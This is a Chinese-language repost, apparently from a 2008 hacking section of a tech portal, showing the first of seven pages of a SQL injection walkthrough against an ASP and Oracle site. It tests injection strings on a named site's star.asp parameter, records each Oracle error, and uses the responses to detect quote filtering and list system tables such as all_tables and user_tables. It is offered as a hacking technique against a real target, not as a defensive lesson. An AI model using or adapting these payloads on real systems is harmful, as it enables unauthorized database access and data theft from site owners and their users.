加入收藏 设为首页
博客 友圈 商城
留言 搜索 投搞
首页 | 网络动态 | 技术文章 | 下载中心 | 设计 | 摄影 | 精彩Flash | 摄影作品 | 顶客排行 | 悠乐论坛
>首页 -> 技术文章 -> 黑客安全

TOP

对ASP+ORACLE的注入
[ 录入者:riqukiqpl | 时间:2008-01-10 02:17:27 | 作者: | 来源:采集所得 | 浏览:1089次 ]
简介:http://et.kpworld.com/star.asp?performer=马三立;    ------------------------------------------------------    OraOLEDB 错误 ’80040e14’ ORA-0..

http://et.kpworld.com/star.asp?performer=马三立;   
------------------------------------------------------   
OraOLEDB 错误 ’80040e14’ ORA-00911:   
invalid character   
/star.asp,行83   

说明过滤了分号。   


http://et.kpworld.com/star.asp?performer=马三立’   
----------------------------------------------------   
OraOLEDB 错误 ’80004005’ ORA-01756:   
括号内的字符串没有正确结束   
/star.asp,行83   


看来存在未过滤单引号问题。   


http://et.kpworld.com/star.asp?performer=马三立’ and ’1’=’1   
----------------------------------------------------------------   
闭和他单引号,正常返回。   


and 0<>(select count(*) from admin) and  ’1’=’1   
-----------------------------------------------------------------   
OraOLEDB 错误 ’80040e37’ ORA-00942:   
table or view does not exist   
/star.asp,行83   


说明不存在ADMIN这个表.   
******************************************************************   


下面需要知道ORACLE的系统表:   


确定表中行的总数:   


select num_rows from user_tables where table_name=’表名 ----------------------存放当前用户所有表   
where table_name=’表名   
’selectcolumn_name,   
from user_tab_columns -----------------------存放所有列   
where table_name=’表名’   


and 0<>(select count(*) from all_tables) and  ’1’=’1   
---------------------------------------------------------------------   
存在!   
all_tables是一个系统表,用来存放当前ID和其他用户的所有表   


and 0<>(select count(*) from user_tables) and  ’1’=’1   
---------------------------------------------------------------------   


返回。有这个系统表,这个表存放当前用户的所有表   


and 0<>(select top 1 table_name from user_tables) and  ’1’=’1   
---------------------------------------------------------------------------------   
OraOLEDB 错误 ’80040e14’ ORA-00923:   
FROM keyword not found where expected   
/star.asp,行83   


不支持TOP 1 ?。。。。。。这种解释好象不太理想。。。   
(经过PINKEYES测试已经确定确实不支持TOP 1)   


and 0<>(select count(*) from user_tables where table_nam<>’’) and  ’1’=’1   
--------------------------------------------------------------------------------------------   


OraOLEDB 错误 ’80040e14’ ORA-00904:   
invalid column name /star.asp,行83   


当语法错误时,会显示无效列名字   


and 0<>(select count(*) from user_tables where table_name<>’’’’) and ’1’=’1   
--------------------------------------------------------------------------------------------   


语法正确时,成功返回标志,看来四个单引号表示空.接下来是对一些函数的测试:   


and 0<>(select count(*) from user_tables where sum(table_name)>1) and ’1’=’1   
------------------------------------------------------------------------------------------------   


OraOLEDB 错误 ’80040e14’ ORA-00934:   
group function is not allowed here  
3
<< < 1 2 3 4 5 6 7 > >> 1/7
】【打印繁体】【投稿】【收藏】 【推荐】【举报】 【关闭】 【返回顶部
[上一篇]S Q L 注 入 路 径 问 题 [下一篇]祥解远程破解盗窃QQ密码

评论

称  呼:
验 证 码:
内  容:

相关栏目

软件应用
操作系统
网络技巧
黑客安全

最新文章

热门文章

推荐文章

相关文章

广告位